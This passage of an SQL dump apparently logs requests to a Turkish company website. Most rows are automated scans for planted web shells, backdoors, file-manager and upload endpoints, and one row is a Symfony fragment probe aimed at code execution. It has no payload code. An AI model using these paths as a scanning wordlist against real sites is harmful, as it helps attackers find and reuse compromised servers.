04:23:56','0000-00-00 00:00:00',301),(40122,'http://3s-technologies.com.tr/tr/css/dmtixucz/golden-access',NULL,'','',30,0,'2025-06-01 04:23:57','0000-00-00 00:00:00',301),(40123,'http://3s-technologies.com.tr/tr/samll.php',NULL,'','',45,0,'2025-06-01 04:23:59','0000-00-00 00:00:00',301),(40124,'http://3s-technologies.com.tr/tr/admin/index_upload.php',NULL,'','',27,0,'2025-06-01 04:24:00','0000-00-00 00:00:00',301),(40125,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/themes.php',NULL,'','',32,0,'2025-06-01 04:24:03','0000-00-00 00:00:00',301),(40126,'http://3s-technologies.com.tr/tr/wp-includes/css/tj.php',NULL,'','',23,0,'2025-06-01 04:24:07','0000-00-00 00:00:00',301),(40127,'http://3s-technologies.com.tr/tr/gc.php',NULL,'','',29,0,'2025-06-01 04:24:07','0000-00-00 00:00:00',301),(40128,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/block-library/admin.php',NULL,'','',25,0,'2025-06-01 04:24:08','0000-00-00 00:00:00',301),(40129,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/mariju.php',NULL,'','',60,0,'2025-06-01 04:24:09','0000-00-00 00:00:00',301),(40130,'http://3s-technologies.com.tr/tr/mcs.php',NULL,'','',31,0,'2025-06-01 04:24:10','0000-00-00 00:00:00',301),(40131,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/midnight/admin.php',NULL,'','',23,0,'2025-06-01 04:24:17','0000-00-00 00:00:00',301),(40132,'http://3s-technologies.com.tr/tr/wp-admin/images/profile.php',NULL,'','',33,0,'2025-06-01 04:24:18','0000-00-00 00:00:00',301),(40133,'http://3s-technologies.com.tr/tr/wp-content/plugins/atomlib.php',NULL,'','',23,0,'2025-06-01 04:24:19','0000-00-00 00:00:00',301),(40134,'http://3s-technologies.com.tr/tr/cd.php',NULL,'','',55,0,'2025-06-01 04:24:21','0000-00-00 00:00:00',301),(40135,'http://3s-technologies.com.tr/tr/nakrip.php',NULL,'','',41,0,'2025-06-01 04:24:24','0000-00-00 00:00:00',301),(40136,'http://3s-technologies.com.tr/tr/gebase.php69',NULL,'','',25,0,'2025-06-01 04:24:25','0000-00-00 00:00:00',301),(40137,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/midnight/colors.php',NULL,'','',51,0,'2025-06-01 04:24:28','0000-00-00 00:00:00',301),(40138,'http://3s-technologies.com.tr/tr/1bwqtre/admin.php',NULL,'','',23,0,'2025-06-01 04:24:29','0000-00-00 00:00:00',301),(40139,'http://3s-technologies.com.tr/tr/wp-includes/ixr/allez.php',NULL,'','',37,0,'2025-06-01 04:24:29','0000-00-00 00:00:00',301),(40140,'http://3s-technologies.com.tr/tr/thumbs.php',NULL,'','',26,0,'2025-06-01 04:24:31','0000-00-00 00:00:00',301),(40141,'http://3s-technologies.com.tr/tr/raf.php',NULL,'','',34,0,'2025-06-01 04:24:34','0000-00-00 00:00:00',301),(40142,'http://3s-technologies.com.tr/tr/sx.php',NULL,'','',168,0,'2025-06-01 04:24:35','0000-00-00 00:00:00',301),(40143,'http://3s-technologies.com.tr/tr/nf.php',NULL,'','',36,0,'2025-06-01 04:24:35','0000-00-00 00:00:00',301),(40144,'http://3s-technologies.com.tr/tr/wp-admin/maint/edit.php',NULL,'','',31,0,'2025-06-01 04:24:36','0000-00-00 00:00:00',301),(40145,'http://3s-technologies.com.tr/tr/dav.php',NULL,'','',30,0,'2025-06-01 04:24:36','0000-00-00 00:00:00',301),(40146,'http://3s-technologies.com.tr/tr/fi2.php',NULL,'','',52,0,'2025-06-01 04:24:37','0000-00-00 00:00:00',301),(40147,'http://3s-technologies.com.tr/tr/admin.php1',NULL,'','',23,0,'2025-06-01 04:24:37','0000-00-00 00:00:00',301),(40148,'http://3s-technologies.com.tr/tr/wp-content/uploads/2023/08/admiin.php',NULL,'','',23,0,'2025-06-01 04:24:43','0000-00-00 00:00:00',301),(40149,'http://3s-technologies.com.tr/tr/aaa.php/getid3-core.php',NULL,'','',22,0,'2025-06-01 04:24:44','0000-00-00 00:00:00',301),(40150,'http://3s-technologies.com.tr/tr/bi.php',NULL,'','',31,0,'2025-06-01 04:24:47','0000-00-00 00:00:00',301),(40151,'http://3s-technologies.com.tr/tr/filter.php',NULL,'','',32,0,'2025-06-01 04:24:49','0000-00-00 00:00:00',301),(40152,'http://3s-technologies.com.tr/tr/wp-content/uploads/wpr-addons/forms/rxrzhwix.php',NULL,'','',30,0,'2025-06-01 04:24:50','0000-00-00 00:00:00',301),(40153,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/blue/blkafewl.php',NULL,'','',26,0,'2025-06-01 04:24:51','0000-00-00 00:00:00',301),(40154,'http://3s-technologies.com.tr/tr/alfa-rexhp1.p',NULL,'','',26,0,'2025-06-01 04:24:51','0000-00-00 00:00:00',301),(40155,'http://3s-technologies.com.tr/tr/wp-content/plugins/pwnd/as.php',NULL,'','',126,0,'2025-06-01 04:24:52','0000-00-00 00:00:00',301),(40156,'http://3s-technologies.com.tr/tr/wp-admin/style.php',NULL,'','',46,0,'2025-06-01 04:24:53','0000-00-00 00:00:00',301),(40157,'http://3s-technologies.com.tr/tr/setup-config.php',NULL,'','',35,0,'2025-06-01 04:24:54','0000-00-00 00:00:00',301),(40158,'http://3s-technologies.com.tr/tr/hinfofuns.php',NULL,'','',33,0,'2025-06-01 04:24:55','0000-00-00 00:00:00',301),(40159,'http://3s-technologies.com.tr/tr/admin-header.php',NULL,'','',40,0,'2025-06-01 04:24:57','0000-00-00 00:00:00',301),(40160,'http://3s-technologies.com.tr/tr/upload/login.php',NULL,'','',32,0,'2025-06-01 04:25:02','0000-00-00 00:00:00',301),(40161,'http://3s-technologies.com.tr/tr/wp-content/plugins/pwnd/dropdown.php',NULL,'','',25,0,'2025-06-01 04:25:04','0000-00-00 00:00:00',301),(40162,'http://3s-technologies.com.tr/tr/wp-content/uploads/2023/admiin.php',NULL,'','',23,0,'2025-06-01 04:25:06','0000-00-00 00:00:00',301),(40163,'http://3s-technologies.com.tr/tr/wp-index.php',NULL,'','',48,0,'2025-06-01 04:25:10','0000-00-00 00:00:00',301),(40164,'http://3s-technologies.com.tr/tr/wp-content/plugins/pwnd-1/dropdown.php',NULL,'','',23,0,'2025-06-01 04:25:11','0000-00-00 00:00:00',301),(40165,'http://3s-technologies.com.tr/tr/wp-content/uploads/setup',NULL,'','',23,0,'2025-06-01 04:25:18','0000-00-00 00:00:00',301),(40166,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/ocean/admiin.php',NULL,'','',23,0,'2025-06-01 04:25:18','0000-00-00 00:00:00',301),(40167,'http://3s-technologies.com.tr/tr/config.php7',NULL,'','',36,0,'2025-06-01 04:25:19','0000-00-00 00:00:00',301),(40168,'http://3s-technologies.com.tr/tr/wp-includes/id3/module.tag.id3v3.php',NULL,'','',23,0,'2025-06-01 04:25:22','0000-00-00 00:00:00',301),(40169,'http://3s-technologies.com.tr/tr/wp-content/uploads/2025/03/themes.php',NULL,'','',38,0,'2025-06-01 04:25:23','0000-00-00 00:00:00',301),(40170,'http://3s-technologies.com.tr/tr/wp-content/themes/divi/includes/widgets/wp-blog.php',NULL,'','',22,0,'2025-06-01 04:25:25','0000-00-00 00:00:00',301),(40171,'http://3s-technologies.com.tr/tr/wp-content/uploads/admiin.php',NULL,'','',20,0,'2025-06-01 04:25:27','0000-00-00 00:00:00',301),(40172,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/ocean',NULL,'','',44,0,'2025-06-01 04:25:28','0000-00-00 00:00:00',301),(40173,'http://3s-technologies.com.tr/tr/favicon.php',NULL,'','',40,0,'2025-06-01 04:25:31','0000-00-00 00:00:00',301),(40174,'http://3s-technologies.com.tr/tr/wp-content/uploads/2014/03/smile.php',NULL,'','',20,0,'2025-06-01 04:25:33','0000-00-00 00:00:00',301),(40175,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/utils',NULL,'','',35,0,'2025-06-01 04:25:33','0000-00-00 00:00:00',301),(40176,'http://3s-technologies.com.tr/tr/wp-includes/css.php',NULL,'','',30,0,'2025-06-01 04:25:35','0000-00-00 00:00:00',301),(40177,'http://3s-technologies.com.tr/tr/.well-known/lofmebwd.php',NULL,'','',26,0,'2025-06-01 04:25:35','0000-00-00 00:00:00',301),(40178,'http://3s-technologies.com.tr/tr/admin/wp-signup.php',NULL,'','',30,0,'2025-06-01 04:25:37','0000-00-00 00:00:00',301),(40179,'http://3s-technologies.com.tr/tr/wp-includes/text/diff/engine.php',NULL,'','',60,0,'2025-06-01 04:25:38','0000-00-00 00:00:00',301),(40180,'http://3s-technologies.com.tr/tr/gzak2w.php',NULL,'','',24,0,'2025-06-01 04:25:42','0000-00-00 00:00:00',301),(40181,'http://3s-technologies.com.tr/tr/v4.php',NULL,'','',78,0,'2025-06-01 04:25:42','0000-00-00 00:00:00',301),(40182,'http://3s-technologies.com.tr/tr/wp-includes/text/lv.php',NULL,'','',26,0,'2025-06-01 04:25:43','0000-00-00 00:00:00',301),(40183,'http://3s-technologies.com.tr/tr/shop.php',NULL,'','',48,0,'2025-06-01 04:25:44','0000-00-00 00:00:00',301),(40184,'http://3s-technologies.com.tr/tr/wp-core.php',NULL,'','',33,0,'2025-06-01 04:25:45','0000-00-00 00:00:00',301),(40185,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/widgets',NULL,'','',37,0,'2025-06-01 04:25:46','0000-00-00 00:00:00',301),(40186,'http://3s-technologies.com.tr/tr/vv.php',NULL,'','',78,0,'2025-06-01 04:25:55','0000-00-00 00:00:00',301),(40187,'http://3s-technologies.com.tr/tr/wp-content/plugins/wordfence/js',NULL,'','',23,0,'2025-06-01 04:25:55','0000-00-00 00:00:00',301),(40188,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/ocean/index.php',NULL,'','',29,0,'2025-06-01 04:25:56','0000-00-00 00:00:00',301),(40189,'http://3s-technologies.com.tr/tr/images/k.php',NULL,'','',30,0,'2025-06-01 04:25:56','0000-00-00 00:00:00',301),(40190,'http://3s-technologies.com.tr/tr/wp-content/plugins/seoo/ulc2.php',NULL,'','',23,0,'2025-06-01 04:26:00','0000-00-00 00:00:00',301),(40191,'http://3s-technologies.com.tr/tr/aaa.php',NULL,'','',153,0,'2025-06-01 04:26:01','0000-00-00 00:00:00',301),(40192,'http://3s-technologies.com.tr/tr/delpaths.php',NULL,'','',39,0,'2025-06-01 04:26:02','0000-00-00 00:00:00',301),(40193,'http://3s-technologies.com.tr/tr/fm2.php',NULL,'','',15,0,'2025-06-01 04:26:02','0000-00-00 00:00:00',301),(40194,'http://3s-technologies.com.tr/tr/wp-content/plugins/wso.php',NULL,'','',23,0,'2025-06-01 04:26:03','0000-00-00 00:00:00',301),(40195,'http://3s-technologies.com.tr/tr/cljntmcz.php',NULL,'','',28,0,'2025-06-01 04:26:05','0000-00-00 00:00:00',301),(40196,'http://www.3s-technologies.com.tr/tr/js/tinymce/filemanager/dialog.php',NULL,'','',1,0,'2025-06-01 05:24:03','0000-00-00 00:00:00',301),(40197,'http://www.3s-technologies.com.tr/tr/assets/tinymce/plugins/filemanager/dialog.php',NULL,'','',1,0,'2025-06-01 05:24:08','0000-00-00 00:00:00',301),(40198,'http://3s-technologies.com.tr/tr/wp-includes/id3/rk2.php',NULL,'','',26,0,'2025-06-01 05:37:47','0000-00-00 00:00:00',301),(40199,'http://3s-technologies.com.tr/tr/wp-content/plugins/wpsml-sys.php',NULL,'','',2,0,'2025-06-01 05:37:48','0000-00-00 00:00:00',301),(40200,'http://3s-technologies.com.tr/tr/wp-includes/id3/themes.php',NULL,'','',3,0,'2025-06-01 05:37:49','0000-00-00 00:00:00',301),(40201,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/network.php',NULL,'','',3,0,'2025-06-01 05:37:50','0000-00-00 00:00:00',301),(40202,'http://3s-technologies.com.tr/tr/images/options.php',NULL,'','',1,0,'2025-06-01 05:37:51','0000-00-00 00:00:00',301),(40203,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-file-manager/file-manager.php',NULL,'','',1,0,'2025-06-01 15:54:32','0000-00-00 00:00:00',301),(40204,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-file-manager/upload.php',NULL,'','',1,0,'2025-06-01 15:54:33','0000-00-00 00:00:00',301),(40205,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-file-manager/shell.php',NULL,'','',1,0,'2025-06-01 15:54:33','0000-00-00 00:00:00',301),(40206,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-file-manager/ajax_upload.php',NULL,'','',1,0,'2025-06-01 15:54:34','0000-00-00 00:00:00',301),(40207,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-file-manager/lib/php/connector.php',NULL,'','',1,0,'2025-06-01 15:54:34','0000-00-00 00:00:00',301),(40208,'http://3s-technologies.com.tr/tr/wp-content/plugins/file-manager/filemanager.php',NULL,'','',1,0,'2025-06-01 15:54:35','0000-00-00 00:00:00',301),(40209,'http://3s-technologies.com.tr/tr/wp-content/plugins/file-manager/elfinder.php',NULL,'','',1,0,'2025-06-01 15:54:35','0000-00-00 00:00:00',301),(40210,'http://3s-technologies.com.tr/tr/wp-content/plugins/advanced-file-manager/filemanager.php',NULL,'','',1,0,'2025-06-01 15:54:36','0000-00-00 00:00:00',301),(40211,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-fileupload/file-upload.php',NULL,'','',1,0,'2025-06-01 15:54:36','0000-00-00 00:00:00',301),(40212,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-file-upload/file-uploader.php',NULL,'','',1,0,'2025-06-01 15:54:37','0000-00-00 00:00:00',301),(40213,'http://3s-technologies.com.tr/tr/wp-content/plugins/evil-file-manager/fm.php',NULL,'','',1,0,'2025-06-01 15:54:37','0000-00-00 00:00:00',301),(40214,'http://3s-technologies.com.tr/tr/wp-content/plugins/ckfinder/ckfinder.php',NULL,'','',1,0,'2025-06-01 15:54:38','0000-00-00 00:00:00',301),(40215,'http://3s-technologies.com.tr/tr/wp-content/plugins/responsive-filemanager/filemanager.php',NULL,'','',1,0,'2025-06-01 15:54:38','0000-00-00 00:00:00',301),(40216,'http://3s-technologies.com.tr/tr/wp-content/plugins/responsive-filemanager/connectors/php/filemanager.php',NULL,'','',1,0,'2025-06-01 15:54:39','0000-00-00 00:00:00',301),(40217,'http://3s-technologies.com.tr/tr/wp-content/plugins/elfinder/php/connector.php',NULL,'','',1,0,'2025-06-01 15:54:39','0000-00-00 00:00:00',301),(40218,'http://3s-technologies.com.tr/tr/assets/qvbgifxl.php',NULL,'','',1,0,'2025-06-01 18:27:15','0000-00-00 00:00:00',301),(40219,'http://3s-technologies.com.tr/tr/comfunctions.php',NULL,'','',34,0,'2025-06-01 18:27:22','0000-00-00 00:00:00',301),(40220,'http://3s-technologies.com.tr/tr/css/access.php',NULL,'','',4,0,'2025-06-01 18:27:25','0000-00-00 00:00:00',301),(40221,'http://3s-technologies.com.tr/tr/css/flower.php',NULL,'','',1,0,'2025-06-01 18:27:25','0000-00-00 00:00:00',301),(40222,'http://3s-technologies.com.tr/tr/css/nqfvanbd.php',NULL,'','',1,0,'2025-06-01 18:27:26','0000-00-00 00:00:00',301),(40223,'http://3s-technologies.com.tr/tr/css/sxo.php',NULL,'','',1,0,'2025-06-01 18:27:27','0000-00-00 00:00:00',301),(40224,'http://3s-technologies.com.tr/tr/css/uslipjzt.php',NULL,'','',1,0,'2025-06-01 18:27:27','0000-00-00 00:00:00',301),(40225,'http://3s-technologies.com.tr/tr/custom-plugin.php',NULL,'','',5,0,'2025-06-01 18:27:28','0000-00-00 00:00:00',301),(40226,'https://3s-technologies.com.tr/tr/?option=com_breezingforms',NULL,'','',1,0,'2025-06-02 07:11:44','0000-00-00 00:00:00',301),(40227,'https://3s-technologies.com.tr/tr/_fragment?_path=_controller=phpcredits&flag=2&_hash=gtbh1fusoqegu5bmjusqgiahtg+b40yexehp+rdnsyw=',NULL,'https://3s-technologies.com.tr/_fragment?_path=_controller%3Dphpcredits%26flag%3D2&_hash=gtbh1fuSoQeGu5BMJUSqgiaHTG%2bb40yExehP%2brdNSYw=','',2,0,'2025-06-02 15:10:57','0000-00-00 00:00:00',301),(40228,'http://3s-technologies.com.tr/tr/wp-content/plugins/elfinder/php/elfinderconnector.class.php',NULL,'','',3,0,'2025-06-02 16:45:10','0000-00-00 00:00:00',301),(40229,'http://3s-technologies.com.tr/tr/wp-content/plugins/ultimate-file-manager/filemanager.php',NULL,'','',2,0,'2025-06-02 16:45:10','0000-00-00 00:00:00',301),(40230,'http://3s-technologies.com.tr/tr/wp-content/plugins/ultimate-file-manager/shell.php',NULL,'','',2,0,'2025-06-02 16:45:11','0000-00-00 00:00:00',301),(40231,'http://3s-technologies.com.tr/tr/wp-content/plugins/advanced-uploader/ajax_upload.php',NULL,'','',2,0,'2025-06-02 16:45:11','0000-00-00 00:00:00',301),(40232,'http://3s-technologies.com.tr/tr/wp-content/plugins/uploader/fileupload.php',NULL,'','',2,0,'2025-06-02 16:45:12','0000-00-00 00:00:00',301),(40233,'http://3s-technologies.com.tr/tr/wp-content/plugins/uploader/shell_upload.php',NULL,'','',2,0,'2025-06-02 16:45:12','0000-00-00 00:00:00',301),(40234,'http://3s-technologies.com.tr/tr/wp-content/plugins/backend-file-manager/manager.php',NULL,'','',2,0,'2025-06-02 16:45:13','0000-00-00 00:00:00',301),(40235,'http://3s-technologies.com.tr/tr/wp-content/plugins/file-upload-pro/ajax-file-upload.php',NULL,'','',2,0,'2025-06-02 16:45:13','0000-00-00 00:00:00',301),(40236,'http://3s-technologies.com.tr/tr/wp-content/plugins/media-upload-pro/upload.php',NULL,'','',2,0,'2025-06-02 16:45:14','0000-00-00 00:00:00',301),(40237,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-media-manager/manager.php',NULL,'','',2,0,'2025-06-02 16:45:14','0000-00-00 00:00:00',301),(40238,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-secure-uploader/secure_upload.php',NULL,'','',2,0,'2025-06-02 16:45:15','0000-00-00 00:00:00',301),(40239,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-ftp-manager/ftp.php',NULL,'','',2,0,'2025-06-02 16:45:16','0000-00-00 00:00:00',301),(40240,'http://3s-technologies.com.tr/tr/wp-content/plugins/php-file-uploader/upload.php',NULL,'','',2,0,'2025-06-02 16:45:16','0000-00-00 00:00:00',301),(40241,'http://3s-technologies.com.tr/tr/wp-content/plugins/php-shell/cmd.php',NULL,'','',2,0,'2025-06-02 16:45:17','0000-00-00 00:00:00',301),(40242,'http://3s-technologies.com.tr/tr/wp-content/plugins/php-backdoor/backdoor.php',NULL,'','',2,0,'2025-06-02 16:45:17','0000-00-00 00:00:00',301),(40243,'http://3s-technologies.com.tr/tr/wp-admin/js/autoload_classmap.php',NULL,'','',58,0,'2025-06-02 19:55:08','0000-00-00 00:00:00',301),(40244,'http://3s-technologies.com.tr/tr/.well-known/caches.php',NULL,'','',15,0,'2025-06-02 19:55:13','0000-00-00 00:00:00',301),(40245,'http://3s-technologies.com.tr/tr/wp-content/plugins/xt',NULL,'','',32,0,'2025-06-02 19:55:21','0000-00-00 00:00:00',301),(40246,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/plugins/compat3x/css',NULL,'','',27,0,'2025-06-02 19:55:25','0000-00-00 00:00:00',301),(40247,'http://3s-technologies.com.tr/tr/public/makeasmtp.php',NULL,'','',16,0,'2025-06-02 19:55:32','0000-00-00 00:00:00',301),(40248,'http://3s-technologies.com.tr/tr/index_.php',NULL,'','',7,0,'2025-06-02 19:55:38','0000-00-00 00:00:00',301),(40249,'http://3s-technologies.com.tr/tr/wp-content/uploads/2022/10/upload.php',NULL,'','',15,0,'2025-06-02 19:55:41','0000-00-00 00:00:00',301),(40250,'http://3s-technologies.com.tr/tr/admin.php7',NULL,'','',27,0,'2025-06-02 19:55:44','0000-00-00 00:00:00',301),(40251,'http://3s-technologies.com.tr/tr/wp-admin/pages.php',NULL,'','',17,0,'2025-06-02 19:55:58','0000-00-00 00:00:00',301),(40252,'http://3s-technologies.com.tr/tr/wp-includes/alfa_data/alfacgiapi/perl.alfa',NULL,'','',37,0,'2025-06-02 19:56:05','0000-00-00 00:00:00',301),(40253,'http://3s-technologies.com.tr/tr/gebase.php',NULL,'','',36,0,'2025-06-02 19:56:07','0000-00-00 00:00:00',301),(40254,'http://3s-technologies.com.tr/tr/privacy.php',NULL,'','',23,0,'2025-06-02 19:56:23','0000-00-00 00:00:00',301),(40255,'http://3s-technologies.com.tr/tr/wp-cli.php',NULL,'','',27,0,'2025-06-02 19:56:24','0000-00-00 00:00:00',301),(40256,'http://3s-technologies.com.tr/tr/media-new.php',NULL,'','',19,0,'2025-06-02 19:56:25','0000-00-00 00:00:00',301),(40257,'http://3s-technologies.com.tr/tr/fresh',NULL,'','',1,0,'2025-06-02 19:56:26','0000-00-00 00:00:00',301),(40258,'http://3s-technologies.com.tr/tr/index.html',NULL,'','',8,0,'2025-06-02 19:56:26','0000-00-00 00:00:00',301),(40259,'http://3s-technologies.com.tr/tr/search/label/php-shells',NULL,'','',15,0,'2025-06-02 19:56:29','0000-00-00 00:00:00',301),(40260,'http://3s-technologies.com.tr/tr/ioxi001.php7',NULL,'','',22,0,'2025-06-02 19:56:30','0000-00-00 00:00:00',301),(40261,'http://3s-technologies.com.tr/tr/dirs.php',NULL,'','',6,0,'2025-06-02 19:56:30','0000-00-00 00:00:00',301),(40262,'http://3s-technologies.com.tr/tr/input.php',NULL,'','',45,0,'2025-06-02 19:56:31','0000-00-00 00:00:00',301),(40263,'http://3s-technologies.com.tr/tr/aged.php',NULL,'','',18,0,'2025-06-02 19:56:33','0000-00-00 00:00:00',301),(40264,'http://3s-technologies.com.tr/tr/user-edit.php',NULL,'','',21,0,'2025-06-02 19:56:34','0000-00-00 00:00:00',301),(40265,'http://3s-technologies.com.tr/tr/engine.php',NULL,'','',34,0,'2025-06-02 19:56:35','0000-00-00 00:00:00',301),(40266,'http://3s-technologies.com.tr/tr/ern1.php7',NULL,'','',19,0,'2025-06-02 19:56:37','0000-00-00 00:00:00',301),(40267,'http://3s-technologies.com.tr/tr/randkeyword.php8',NULL,'','',27,0,'2025-06-02 19:56:38','0000-00-00 00:00:00',301),(40268,'http://3s-technologies.com.tr/tr/wp-includes/pomo/fgertreyersd.php.suspected',NULL,'','',10,0,'2025-06-02 19:56:38','0000-00-00 00:00:00',301),(40269,'http://3s-technologies.com.tr/tr/css/xmrlpc.php',NULL,'','',49,0,'2025-06-02 19:56:39','0000-00-00 00:00:00',301),(40270,'http://3s-technologies.com.tr/tr/filebrowser.php',NULL,'','',20,0,'2025-06-02 19:56:43','0000-00-00 00:00:00',301),(40271,'http://3s-technologies.com.tr/tr/wp-includes/requests/chosen.php',NULL,'','',23,0,'2025-06-02 19:56:46','0000-00-00 00:00:00',301),(40272,'http://3s-technologies.com.tr/tr/home/function.php',NULL,'','',17,0,'2025-06-02 19:56:56','0000-00-00 00:00:00',301),(40273,'http://3s-technologies.com.tr/tr/wp-includes/requests/library/about.php',NULL,'','',22,0,'2025-06-02 19:56:59','0000-00-00 00:00:00',301),(40274,'http://3s-technologies.com.tr/tr/wp-includes/autoloadclassmap.php',NULL,'','',14,0,'2025-06-02 19:57:10','0000-00-00 00:00:00',301),(40275,'http://3s-technologies.com.tr/tr/acp.php',NULL,'','',120,0,'2025-06-02 19:57:12','0000-00-00 00:00:00',301),(40276,'http://3s-technologies.com.tr/tr/.well-known/caches.php.suspected',NULL,'','',4,0,'2025-06-02 19:57:13','0000-00-00 00:00:00',301),(40277,'http://3s-technologies.com.tr/tr/wp-content/upgrade/wp-login.php',NULL,'','',17,0,'2025-06-02 19:57:48','0000-00-00 00:00:00',301),(40278,'http://3s-technologies.com.tr/tr/used:',NULL,'','',1,0,'2025-06-02 19:57:55','0000-00-00 00:00:00',301),(40279,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/gzdecodes.php.suspected',NULL,'','',6,0,'2025-06-02 19:58:05','0000-00-00 00:00:00',301),(40280,'http://3s-technologies.com.tr/tr/themes/index.php',NULL,'','',17,0,'2025-06-02 19:58:07','0000-00-00 00:00:00',301),(40281,'http://3s-technologies.com.tr/tr/moderation.php',NULL,'','',20,0,'2025-06-02 19:58:08','0000-00-00 00:00:00',301),(40282,'http://3s-technologies.com.tr/tr/wp-content/plugins/google-seo-rank/module.php',NULL,'','',20,0,'2025-06-02 22:16:40','0000-00-00 00:00:00',301),(40283,'http://3s-technologies.com.tr/tr/wp-includes/sodium_compat/autoload_classmap.php/wp-includes/images/smilies/about.php',NULL,'','',4,0,'2025-06-02 22:16:52','0000-00-00 00:00:00',301),(40284,'http://3s-technologies.com.tr/tr/assets/jquery-file-upload/server/php',NULL,'','',1,0,'2025-06-05 05:09:04','0000-00-00 00:00:00',301),(40285,'http://3s-technologies.com.tr/tr/assets/backend/plugins/jquery-file-upload/server/php',NULL,'','',1,0,'2025-06-05 05:09:06','0000-00-00 00:00:00',301),(40286,'http://3s-technologies.com.tr/tr/plugins/jquery-file-upload/server/php',NULL,'','',1,0,'2025-06-05 05:09:09','0000-00-00 00:00:00',301),(40287,'http://3s-technologies.com.tr/tr/assets/libs/jquery-file-upload/server/php',NULL,'','',1,0,'2025-06-05 05:09:12','0000-00-00 00:00:00',301),(40288,'http://3s-technologies.com.tr/tr/assets/lib/jquery-file-upload/server/php',NULL,'','',1,0,'2025-06-05 05:09:14','0000-00-00 00:00:00',301),(40289,'http://3s-technologies.com.tr/tr/lib/jquery-file-upload/server/php',NULL,'','',1,0,'2025-06-05 05:09:16','0000-00-00 00:00:00',301),(40290,'http://3s-technologies.com.tr/tr/js/jquery-file-upload/server/php',NULL,'','',1,0,'2025-06-05 05:09:19','0000-00-00 00:00:00',301),(40291,'http://3s-technologies.com.tr/tr/assets/global/plugins/jquery-file-upload/server/php',NULL,'','',1,0,'2025-06-05 05:09:23','0000-00-00 00:00:00',301),(40292,'http://3s-technologies.com.tr/tr/resources/global/plugins/jquery-file-upload/server/php',NULL,'','',1,0,'2025-06-05 05:09:25','0000-00-00 00:00:00',301),(40293,'http://3s-technologies.com.tr/tr/app/webroot/global/plugins/jquery-file-upload/server/php',NULL,'','',1,0,'2025-06-05 05:09:27','0000-00-00 00:00:00',301),(40294,'http://3s-technologies.com.tr/tr/assets/themes/metronic/global/jquery-file-upload/server/php',NULL,'','',1,0,'2025-06-05 05:09:29','0000-00-00 00:00:00',301),(40295,'http://3s-technologies.com.tr/tr/metronic/assets/global/plugins/jquery-file-upload/server/php',NULL,'','',1,0,'2025-06-05 05:09:32','0000-00-00 00:00:00',301),(40296,'http://3s-technologies.com.tr/tr/coloradmin/assets/plugins/jquery-file-upload/server/php',NULL,'','',1,0,'2025-06-05 05:09:34','0000-00-00 00:00:00',301),(40297,'http://3s-technologies.com.tr/tr/assets/color_admin/plugins/jquery-file-upload/server/php',NULL,'','',1,0,'2025-06-05 05:09:36','0000-00-00 00:00:00',301),(40298,'http://3s-technologies.com.tr/tr/assets/vendor_admin/plugins/jquery-file-upload/server/php',NULL,'','',1,0,'2025-06-05 05:09:38','0000-00-00 00:00:00',301),(40299,'http://3s-technologies.com.tr/tr/public/javascript/jquery.upload/server/php',NULL,'','',1,0,'2025-06-05 05:09:41','0000-00-00 00:00:00',301),(40300,'http://3s-technologies.com.tr/tr/media/mediamgr/other/jq_fileupload/server/php',NULL,'','',1,0,'2025-06-05 05:09:43','0000-00-00 00:00:00',301),(40301,'http://3s-technologies.com.tr/tr/formcraft/file-upload/server/php',NULL,'','',1,0,'2025-06-05 05:09:45','0000-00-00 00:00:00',301),(40302,'http://3s-technologies.com.tr/tr/coaster/jquery/gallery-upload/server/php',NULL,'','',1,0,'2025-06-05 05:09:47','0000-00-00 00:00:00',301),(40303,'http://3s-technologies.com.tr/tr/assets/plugins/jquery.filer/php/readme.txt',NULL,'','',1,0,'2025-06-05 05:09:49','0000-00-00 00:00:00',301),(40304,'http://3s-technologies.com.tr/tr/assets/vendor/jquery.filer/php/readme.txt',NULL,'','',1,0,'2025-06-05 05:09:52','0000-00-00 00:00:00',301),(40305,'http://3s-technologies.com.tr/tr/plugins/jquery.filer/php/readme.txt',NULL,'','',1,0,'2025-06-05 05:09:55','0000-00-00 00:00:00',301),(40306,'http://3s-technologies.com.tr/tr/assets/admin/bower_components/jquery.filer/php/readme.txt',NULL,'','',1,0,'2025-06-05 05:09:57','0000-00-00 00:00:00',301),(40307,'http://3s-technologies.com.tr/tr/jquery.filer/php/readme.txt',NULL,'','',1,0,'2025-06-05 05:09:59','0000-00-00 00:00:00',301),(40308,'http://3s-technologies.com.tr/tr/getid3-core.php',NULL,'','',9,0,'2025-06-06 14:57:19','0000-00-00 00:00:00',301),(40309,'http://3s-technologies.com.tr/tr/cgi-bin/radio.php',NULL,'','',9,0,'2025-06-07 04:22:42','0000-00-00 00:00:00',301),(40310,'http://3s-technologies.com.tr/tr/smaxx.php',NULL,'','',14,0,'2025-06-07 05:38:59','0000-00-00 00:00:00',301),(40311,'http://3s-technologies.com.tr/tr/wp-admin/smaxx.php',NULL,'','',8,0,'2025-06-07 05:38:59','0000-00-00 00:00:00',301),(40312,'http://3s-technologies.com.tr/tr/wp-content/plugins/wordpresscore/smaxx.php',NULL,'','',8,0,'2025-06-07 05:39:00','0000-00-00 00:00:00',301),(40313,'http://3s-technologies.com.tr/tr/wp-includes/images/smaxx.php',NULL,'','',8,0,'2025-06-07 05:39:01','0000-00-00 